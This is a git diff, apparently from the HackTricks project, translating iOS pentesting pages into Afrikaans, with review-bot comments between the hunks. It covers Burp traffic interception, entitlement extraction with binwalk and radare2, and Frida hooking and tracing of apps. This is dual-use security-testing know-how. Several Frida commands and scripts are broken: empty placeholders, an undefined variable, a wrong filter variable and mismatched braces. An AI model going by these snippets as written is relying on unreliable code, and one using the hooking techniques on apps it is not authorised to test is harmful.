PortSwigger se tutoriale bied in-diepte instruksies oor [toestelkonfigurasie](https://support.portswigger.net/customer/portal/articles/1841108-configuring-an-ios-device-to-work-with-burp) en [sertifikaat-installasie](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device). -### Advanced Configuration for Jailbroken Devices -For users with jailbroken devices, SSH over USB (via **iproxy**) offers a method to route traffic directly through Burp: +### Gevorderde konfigurasie vir gejailbreakte toestelle +Vir gebruikers met gejailbreakte toestelle bied SSH oor USB (via **iproxy**) 'n metode om verkeer direk deur Burp te roeteer: -1. **Establish SSH Connection:** Use iproxy to forward SSH to localhost, allowing connection from the iOS device to the computer running Burp. - ```bash - iproxy 2222 22 - ``` -2. **Remote Port Forwarding:** Forward the iOS device's port 8080 to the computer's localhost to enable direct access to Burp's interface. - ```bash - ssh -R 8080:localhost:8080 root@localhost -p 2222 - ``` -3. **Global Proxy Setting:** Lastly, configure the iOS device's Wi-Fi settings to use a manual proxy, directing all web traffic through Burp. +1. **Stel SSH-verbinding op:** Gebruik iproxy om SSH na localhost te stuur, sodat die iOS-toestel 'n verbinding met die rekenaar wat Burp hardloop, kan maak. +```bash +iproxy 2222 22 +``` +2. **Verre Port Forwarding:** Stuur die iOS-toestel se poort 8080 na die rekenaar se localhost om direkte toegang tot Burp se koppelvlak moontlik te maak. +```bash +ssh -R 8080:localhost:8080 root@localhost -p 2222 +``` +3. **Globale Proksi-instelling:** Laastens, stel die Wi-Fi-instellings van die iOS-toestel in om 'n handmatige proksi te gebruik, wat alle webverkeer deur Burp rig. 
+### Volledige Netwerkmonitoring/Sniffing -### Full Network Monitoring/Sniffing +Die monitering van nie-HTTP-toestelverkeer kan effektief uitgevoer word met behulp van **Wireshark**, 'n instrument wat in staat is om alle vorme van data-verkeer vas te lê. Vir iOS-toestelle word die monitering van verkeer in werklike tyd fasiliteer deur die skep van 'n Remote Virtual Interface, 'n proses wat in [hierdie Stack Overflow-pos](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819) beskryf word. Voor die begin van die proses is die installasie van **Wireshark** op 'n macOS-stelsel 'n vereiste. -Monitoring of non-HTTP device traffic can be efficiently conducted using **Wireshark**, a tool capable of capturing all forms of data traffic. For iOS devices, real-time traffic monitoring is facilitated through the creation of a Remote Virtual Interface, a process detailed in [this Stack Overflow post](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819). Prior to beginning, installation of **Wireshark** on a macOS system is a prerequisite. - -The procedure involves several key steps: - -1. Initiate a connection between the iOS device and the macOS host via USB. -2. Ascertain the iOS device's **UDID**, a necessary step for traffic monitoring. This can be done by executing a command in the macOS Terminal: +Die prosedure behels verskeie sleutelstappe: +1. Begin 'n verbinding tussen die iOS-toestel en die macOS-gashere via USB. +2. Bepaal die iOS-toestel se **UDID**, 'n noodsaaklike stap vir verkeersmonitering. Dit kan gedoen word deur 'n opdrag in die macOS-Terminal uit te voer: ```bash $ rvictl -s Starting device [SUCCEEDED] with interface rvi0 ``` +3. Na identifikasie van die UDID, moet **Wireshark** geopen word en die "rvi0"-koppelvlak vir data-opname gekies word. +4. 
Vir doelgerigte monitering, soos die opname van HTTP-verkeer wat verband hou met 'n spesifieke IP-adres, kan Wireshark se Opnamefilters gebruik word: -3. Post-identification of the UDID, **Wireshark** is to be opened, and the "rvi0" interface selected for data capture. -4. For targeted monitoring, such as capturing HTTP traffic related to a specific IP address, Wireshark's Capture Filters can be employed: +## Burp-sertifikaatinstallasie in die Simulator -## Burp Cert Installation in Simulator +* **Voer Burp-sertifikaat uit** -* **Export Burp Certificate** - -In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER format_ +In _Proxy_ --> _Opsies_ --> _Voer CA-sertifikaat uit_ --> _Sertifikaat in DER-formaat_ ![](<../../.gitbook/assets/image (459).png>) -* **Drag and Drop** the certificate inside the Emulator -* **Inside the emulator** go to _Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_, and **verify the certificate** -* **Inside the emulator** go to _Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_, and **enable PortSwigger CA** +* **Sleep en laat val** die sertifikaat binne die Emulator +* **Binne die emulator** gaan na _Instellings_ --> _Algemeen_ --> _Profiel_ --> _PortSwigger CA_, en **verifieer die sertifikaat** +* **Binne die emulator** gaan na _Instellings_ --> _Algemeen_ --> _Oor_ --> _Sertifikaatvertrouensinstellings_, en **aktiveer PortSwigger CA** ![](<../../.gitbook/assets/image (460).png>) -**Congrats, you have successfully configured the Burp CA Certificate in the iOS simulator** +**Geluk, jy het die Burp CA-sertifikaat suksesvol gekonfigureer in die iOS-simulator** {% hint style="info" %} -**The iOS simulator will use the proxy configurations of the MacOS.** +**Die iOS-simulator sal die proksi-konfigurasies van MacOS gebruik.** {% endhint %} -### MacOS Proxy Configuration +### MacOS Proksi-konfigurasie -Steps to configure Burp as proxy: +Stappe om Burp as proksi te konfigureer: -* Go to _System 
Preferences_ --> _Network_ --> _Advanced_ -* In _Proxies_ tab mark _Web Proxy (HTTP)_ and _Secure Web Proxy (HTTPS)_ -* In both options configure _127.0.0.1:8080_ +* Gaan na _Sisteemvoorkeure_ --> _Netwerk_ --> _Gevorderd_ +* Op die _Proksi_ -tabblad merk _Webproksi (HTTP)_ en _Veilige webproksi (HTTPS)_ +* Konfigureer in beide opsies _127.0.0.1:8080_ ![](<../../.gitbook/assets/image (461).png>) -* Click on _**Ok**_ and the in _**Apply**_ +* Klik op _**Ok**_ en dan op _**Toepas**_
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
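Review bot: In the `Gevorderde konfigurasie vir gejailbreakte toestelle` section of this hunk the two fenced blocks that sit under numbered list items lose their three-space indentation: the `-` lines for the ```bash fence, `iproxy 2222 22` and `ssh -R 8080:localhost:8080 root@localhost -p 2222` are indented under items 1 and 2, while the `+` replacements start at column 0. In Markdown a column-0 fence terminates the ordered list, so `2. **Verre Port Forwarding:**` and `3. **Globale Proksi-instelling:**` render as fresh lists starting at 1; the translator must keep whitespace inside lists and fences byte-for-byte. Two smaller items in the same hunk are pre-existing but worth fixing now: the `$ rvictl -s` command is shown without the device argument even though the step says to pass the UDID (`rvictl -s <UDID>` matches the prose), and `Wireshark se Opnamefilters gebruik word:` ends in a colon with no filter expression following, exactly as the English `-` line does. Finally, the first Trickest banner in the file drops the bold on `werkstrome` and `mees gevorderde` while the second banner keeps it; make the two copies identical.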
diff --git a/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md index ff735fb68..63c94c79b 100644 --- a/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md +++ b/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md @@ -1,32 +1,31 @@ -# Extracting Entitlements from Compiled Application +# Uittreksel van Toekennings uit Saamgestelde Toepassing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Summary of the page [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary) +Opsomming van die bladsy [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary) -### **Extracting Entitlements and Mobile Provision Files** +### **Uittreksel van Toekennings en Mobiele Voorsieningslêers** -When dealing with an app's IPA or an installed app on a jailbroken device, finding `.entitlements` files or the `embedded.mobileprovision` file directly may not be possible. However, entitlements property lists can still be extracted from the app binary, following the procedures outlined in the "iOS Basic Security Testing" chapter, particularly the "Acquiring the App Binary" section. +Wanneer jy te doen het met 'n app se IPA of 'n geïnstalleerde app op 'n jailbroken-toestel, mag dit nie moontlik wees om `.entitlements`-lêers of die `embedded.mobileprovision`-lêer direk te vind nie. Tog kan toekennings-eienskappe-lyste steeds uit die app-binêre lêer gehaal word deur die prosedures te volg wat in die hoofstuk "iOS Basiese Sekuriteitstoetsing" uiteengesit word, veral die afdeling "Die App-binêre bekom". -Even with encrypted binaries, certain steps can be employed to extract these files. Should these steps fail, tools such as Clutch (if compatible with the iOS version), frida-ios-dump, or similar utilities may be required to decrypt and extract the app. +Selfs met versleutelde binêre lêers kan sekere stappe gebruik word om hierdie lêers uit te trek. 
As hierdie stappe misluk, mag gereedskap soos Clutch (as dit versoenbaar is met die iOS-weergawe), frida-ios-dump, of soortgelyke hulpmiddels benodig word om die app te ontsluit en uit te trek. -#### **Extracting the Entitlements Plist from the App Binary** - -With the app binary accessible on a computer, **binwalk** can be utilized to extract all XML files. The command below demonstrates how to do so: +#### **Uittreksel van die Toekennings Plist uit die App-binêre** +Met die app-binêre lêer toeganklik op 'n rekenaar, kan **binwalk** gebruik word om alle XML-lêers uit te trek. Die onderstaande opdrag demonstreer hoe om dit te doen: ```bash $ binwalk -e -y=xml ./Telegram\ X 
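Review bot: Translating Entitlements as `Toekennings` in the title and in `### **Uittreksel van Toekennings en Mobiele Voorsieningslêers**` hides the iOS technical term the rest of the page depends on: the `.entitlements` file name, the `embedded.mobileprovision` file and the linked MASTG test all use the English words, and readers will search for them. Keep `Entitlements` (optionally with `toekennings` in brackets on first use) and keep `Mobile Provision` alongside `mobileprovision`. Two consistency points in the same hunk: `jailbroken-toestel` here versus `gejailbreakte toestelle` in burp-configuration-for-ios.md in this same commit, so pick one form; and the `+` version drops the blank line that separated `Die onderstaande opdrag demonstreer hoe om dit te doen:` from the ```bash fence, which CommonMark tolerates but which the other pages keep, so keep it here as well.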
@@ -35,40 +34,33 @@ DECIMAL HEXADECIMAL DESCRIPTION 1430180 0x15D2A4 XML document, version: "1.0" 1458814 0x16427E XML document, version: "1.0" ``` - -Alternatively, **radare2** can be used to quietly run a command and exit, searching for all strings in the app binary that contain "PropertyList": - +Alternatiewelik kan **radare2** gebruik word om stilweg 'n opdrag uit te voer en af te sluit, deur te soek na alle strings in die app binêre lêer wat "PropertyList" bevat: ```bash $ r2 -qc 'izz~PropertyList' ./Telegram\ X 0x0015d2a4 ascii ... 0x0016427d ascii H... ``` +Beide metodes, binwalk en radare2, maak die ekstraksie van `plist` lêers moontlik, met 'n inspeksie van die eerste een (0x0015d2a4) wat 'n suksesvolle herwinning van die [oorspronklike entitlements-lêer van Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements) onthul. -Both methods, binwalk and radare2, enable the extraction of `plist` files, with an inspection of the first one (0x0015d2a4) revealing a successful recovery of the [original entitlements file from Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements). - -For app binaries accessed on jailbroken devices (e.g., via SSH), the **grep** command with the `-a, --text` flag can be used to treat all files as ASCII text: - +Vir app-binêre lêers wat op jailbroken-toestelle toegang verkry (bv. via SSH), kan die **grep**-opdrag met die `-a, --text` vlag gebruik word om alle lêers as ASCII-teks te hanteer: ```bash $ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/... ``` +Die aanpassing van die `-A num, --after-context=num` vlag maak dit moontlik om meer of minder lyne te vertoon. Hierdie metode is selfs bruikbaar vir versleutelde app-binêre lêers en is geverifieer teen verskeie App Store-apps. 
Gereedskap wat vroeër genoem is, kan ook gebruik word op jailbroken iOS-toestelle vir soortgelyke doeleindes. -Adjusting the `-A num, --after-context=num` flag allows for the display of more or fewer lines. This method is viable even for encrypted app binaries and has been verified against multiple App Store apps. Tools mentioned earlier may also be employed on jailbroken iOS devices for similar purposes. - -**Note**: Direct use of the `strings` command is not recommended for this task due to its limitations in finding relevant information. Instead, employing grep with the `-a` flag on the binary or utilizing radare2 (`izz`)/rabin2 (`-zz`) is advisable for more effective results. +**Nota**: Direkte gebruik van die `strings`-opdrag word nie aanbeveel vir hierdie taak nie as gevolg van sy beperkings om relevante inligting te vind. Dit is raadsaam om in plaas daarvan grep met die `-a`-vlag op die binêre lêer te gebruik of radare2 (`izz`)/rabin2 (`-zz`) te gebruik vir meer doeltreffende resultate.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 0f3d07326..dbd52086e 100644 --- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -1,56 +1,93 @@ -# iOS Frida Configuration +# iOS Frida Konfigurasie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Installing Frida +## Frida-installasie -**Steps to install Frida on a Jailbroken device:** +**Stappe om Frida op 'n Jailbroken-toestel te installeer:** -1. Open Cydia/Sileo app. -2. Navigate to Manage -> Sources -> Edit -> Add. -3. Enter "https://build.frida.re" as the URL. -4. Go to the newly added Frida source. -5. Install the Frida package. +1. Maak die Cydia/Sileo-app oop. +2. Navigeer na Beheer -> Bronne -> Wysig -> Voeg by. +3. Voer "https://build.frida.re" as die URL in. +4. Gaan na die nuut bygevoegde Frida-bron. +5. Installeer die Frida-pakket. -If you are using **Corellium** you will need to download the Frida release from [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) and unpack and copy to the dylib location Frida asks for, e.g.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib` +As jy **Corellium** gebruik, moet jy die Frida-vrystelling aflaai vanaf [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) en uitpak en kopieer na die dylib-plek waarvoor Frida vra, bv.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib` -After installed, you can use in your PC the command **`frida-ls-devices`** and check that the device appears (your PC needs to be able to access it).\ -Execute also **`frida-ps -Uia`** to check the running processes of the phone. +Nadat dit geïnstalleer is, kan jy die opdrag **`frida-ls-devices`** op jou rekenaar gebruik en kyk of die toestel verskyn (jou rekenaar moet toegang daartoe hê).\ +Voer ook **`frida-ps -Uia`** uit om die lopende prosesse van die telefoon te kontroleer. 
-## Frida without Jailbroken device & without patching the app +## Frida sonder 'n Jailbroken-toestel & sonder om die app te patch -Check this blog post about how to use Frida in non-jailbroken devices without patching the app: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07) +Kyk na hierdie blogpos oor hoe om Frida te gebruik in nie-jailbroken-toestelle sonder om die app te patch: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07) -## Frida Client Installation - -Install **frida tools**: +## Frida-kliëntinstallasie +Installeer **frida-gereedskap**: ```bash pip install frida-tools pip install frida ``` - -With the Frida server installed and the device running and connected, **check** if the client is **working**: - +Met die Frida-bediener geïnstalleer en die toestel wat loop en verbind is, **kontroleer** of die kliënt **werk**: ```bash frida-ls-devices # List devices frida-ps -Uia # Get running processes ``` +## Frida Spoor -## Frida Trace +Frida Trace is a powerful dynamic instrumentation tool that allows you to trace function calls and monitor the behavior of an iOS application in real-time. It can be used for various purposes, such as debugging, reverse engineering, and vulnerability analysis. +Frida Trace works by injecting a JavaScript code into the target application, which allows you to hook into specific functions and intercept their execution. This gives you the ability to log function arguments, return values, and even modify the behavior of the application on the fly. 
+ +To configure Frida Trace in iOS, follow these steps: + +1. Install Frida on your iOS device by using the Frida CLI or FridaGadget. You can find detailed instructions on how to install Frida in the official documentation. + +2. Connect your iOS device to your computer using a USB cable. + +3. Launch the target application on your iOS device. + +4. Open a terminal window and navigate to the directory where you have installed Frida. + +5. Run the following command to start the Frida server on your iOS device: + + ``` + frida-server -l 0.0.0.0 + ``` + +6. On your computer, run the following command to list the processes running on your iOS device: + + ``` + frida-ps -U + ``` + + This will display a list of processes along with their process IDs (PIDs). + +7. Identify the process ID of the target application from the list. + +8. Run the following command to attach Frida to the target application: + + ``` + frida -U -l -p + ``` + + Replace `` with the path to your JavaScript code and `` with the process ID of the target application. + +9. Your JavaScript code will be executed in the context of the target application, allowing you to trace function calls and monitor its behavior. + +By using Frida Trace, you can gain valuable insights into the inner workings of an iOS application and identify potential vulnerabilities or security issues. It is a versatile tool that can greatly enhance your iOS pentesting capabilities. ```bash # Functions ## Trace all functions with the word "log" in their name @@ -68,14 +105,13 @@ frida-trace -U -m "*[NE* *authentication*]" ## To hook a plugin that is momentarely executed prepare Frida indicating the ID of the Plugin binary frida-trace -U -W -m '*[* *]' ``` +### Kry alle klasse en metodes -### Get all classes and methods - -* Auto complete: Just execute `frida -U ` +* Outomatiese voltooiing: Voer eenvoudig `frida -U ` uit
-* Get **all** available **classes** (filter by string) +* Kry **alle** beskikbare **klasse** (gefiltreer deur string) {% code title="/tmp/script.js" %} ```javascript @@ -84,20 +120,20 @@ frida-trace -U -W -m '*[* *]' var filterClass = "filterstring"; if (ObjC.available) { - for (var className in ObjC.classes) { - if (ObjC.classes.hasOwnProperty(className)) { - if (!filterClass || className.includes(filterClass)) { - console.log(className); - } - } - } +for (var className in ObjC.classes) { +if (ObjC.classes.hasOwnProperty(className)) { +if (!filterClass || className.includes(filterClass)) { +console.log(className); +} +} +} } else { - console.log("Objective-C runtime is not available."); +console.log("Objective-C runtime is not available."); } ``` {% endcode %} -* Get **all** **methods** of a **class** (filter by string) +* Kry **alle** **metodes** van 'n **klas** (gefilter deur string) {% code title="/tmp/script.js" %} ```javascript 
@@ -107,46 +143,45 @@ var specificClass = "YourClassName"; var filterMethod = "filtermethod"; if (ObjC.available) { - if (ObjC.classes.hasOwnProperty(specificClass)) { - var methods = ObjC.classes[specificClass].$ownMethods; - for (var i = 0; i < methods.length; i++) { - if (!filterMethod || methods[i].includes(filterClass)) { - console.log(specificClass + ': ' + methods[i]); - } - } - } else { - console.log("Class not found."); - } +if (ObjC.classes.hasOwnProperty(specificClass)) { +var methods = ObjC.classes[specificClass].$ownMethods; +for (var i = 0; i < methods.length; i++) { +if (!filterMethod || methods[i].includes(filterClass)) { +console.log(specificClass + ': ' + methods[i]); +} +} } else { - console.log("Objective-C runtime is not available."); +console.log("Class not found."); +} +} else { +console.log("Objective-C runtime is not available."); } ``` {% endcode %} -* **Call a function** - +* **Roep 'n funksie aan** ```javascript // Find the address of the function to call const func_addr = Module.findExportByName("", ""); // Declare the function to call const func = new NativeFunction( - func_addr, - "void", ["pointer", "pointer", "pointer"], { +func_addr, +"void", ["pointer", "pointer", "pointer"], { }); var arg0 = null; // In this case to call this function we need to intercept a call to it to copy arg0 Interceptor.attach(wg_log_addr, { - onEnter: function(args) { - arg0 = new NativePointer(args[0]); - } +onEnter: function(args) { +arg0 = new NativePointer(args[0]); +} }); -// Wait untill a call to the func occurs +// Wait untill a call to the func occurs while (! arg0) { - Thread.sleep(1); - console.log("waiting for ptr"); +Thread.sleep(1); +console.log("waiting for ptr"); } 
@@ -156,60 +191,56 @@ wg_log(arg0, arg1, txt); console.log("loaded"); ``` - ## Frida Fuzzing ### Frida Stalker -[From the docs](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): Stalker is Frida’s code **tracing engine**. It allows threads to be **followed**, **capturing** every function, **every block**, even every instruction which is executed. +[Van die dokumentasie](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): Stalker is Frida se kode **naspeuringsenjin**. Dit maak dit moontlik om drade te **volg**, elke funksie **vas te vang**, elke blok, selfs elke instruksie wat uitgevoer word. -You have an example implementing Frida Stalker in [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) - -This is another example to attach Frida Stalker every time a function is called: +Jy het 'n voorbeeld wat Frida Stalker implementeer in [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) +Hier is nog 'n voorbeeld om Frida Stalker aan te heg elke keer as 'n funksie geroep word: ```javascript console.log("loading"); const wg_log_addr = Module.findExportByName("", ""); const wg_log = new NativeFunction( - wg_log_addr, - "void", ["pointer", "pointer", "pointer"], { +wg_log_addr, +"void", ["pointer", "pointer", "pointer"], { }); Interceptor.attach(wg_log_addr, { - onEnter: function(args) { - console.log(`logging the following message: ${args[2].readCString()}`); - - Stalker.follow({ - events: { - // only collect coverage for newly encountered blocks - compile: true, - }, - onReceive: function (events) { - const bbs = Stalker.parse(events, { - stringify: false, - annotate: false - }); - console.log("Stalker trace of write_msg_to_log: \n" + 
bbs.flat().map(DebugSymbol.fromAddress).join('\n')); - } - }); - }, - onLeave: function(retval) { - Stalker.unfollow(); - Stalker.flush(); // this is important to get all events - } +onEnter: function(args) { +console.log(`logging the following message: ${args[2].readCString()}`); + +Stalker.follow({ +events: { +// only collect coverage for newly encountered blocks +compile: true, +}, +onReceive: function (events) { +const bbs = Stalker.parse(events, { +stringify: false, +annotate: false +}); +console.log("Stalker trace of write_msg_to_log: \n" + bbs.flat().map(DebugSymbol.fromAddress).join('\n')); +} +}); +}, +onLeave: function(retval) { +Stalker.unfollow(); +Stalker.flush(); // this is important to get all events +} }); ``` - {% hint style="danger" %} -This is interesting from debugging purposes but for fuzzing, to be constantly **`.follow()`** and **`.unfollow()`** is very inefficient. +Dit is interessant vir doeleindes van foutopsporing, maar vir fuzzing is dit baie ondoeltreffend om voortdurend **`.follow()`** en **`.unfollow()`** te gebruik. {% endhint %} ## [Fpicker](https://github.com/ttdennis/fpicker) -[**fpicker**](https://github.com/ttdennis/fpicker) is a **Frida-based fuzzing suite** that offers a variety of 